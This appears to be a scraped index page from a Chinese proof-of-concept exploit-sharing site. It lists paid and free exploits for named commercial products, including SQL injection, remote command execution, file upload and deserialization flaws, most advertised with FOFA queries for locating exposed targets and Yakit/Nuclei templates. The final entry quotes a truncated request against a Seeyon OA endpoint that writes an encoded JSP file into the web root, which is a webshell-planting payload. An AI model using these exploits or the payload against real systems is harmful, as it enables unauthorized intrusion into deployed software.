POC_秃兔安全

更新

浏览

积木报表JeecgBoot存在SQL注入

2024你懂的

秃兔8个月前

01208

福建科立讯通信有限公司指挥调度管理平台send_fax 命令执行

fofa语句yakit 插件uuidpocyakit && nuclei yaml已验证

付费阅读500 # poc # yakit # nuceli

dreamer2926个月前

011911

【通用】绿盟 SAS堡垒机 chgplay 远程命令执行漏洞

fofa语句yakit插件uuidpocyaml已验证

付费阅读500 # poc

dreamer2924个月前

01109

【通用】NUUO oemupload.php 文件上传

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2923个月前

06314

【通用】红盟发卡系统 orderContent 反序列化rce

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2922个月前

0576

【通用】CNVD-2025-07265

fofa语句yakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2921个月前

05212

【通用】NetMRI userAdmin SQL注入（CVE-2025-32814）

fofa语句官方yaml

# poc

dreamer29225天前

0447

【2025特殊通用】南北软件ERP ListDir 目录遍历

fofa语句pocyaml已验证

付费阅读500 # poc

dreamer29223天前

03115

【通用】九思OA upload_l.jsp 任意文件上传

fofa 语句poc细节注意上传的文件名必须是xxxlogin.jsp 字符中有login就可以正常的访问，不能有数字要纯字符yakit 有问题写的插件发的包有问题所以没提供yakit插件nuclei yaml已验证

付费阅读300 # poc # yakit # nuclei

dreamer2928个月前

016010

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...

2024你懂的

秃兔8个月前

08213

上一页 1…21 222324 25…53 下一页跳转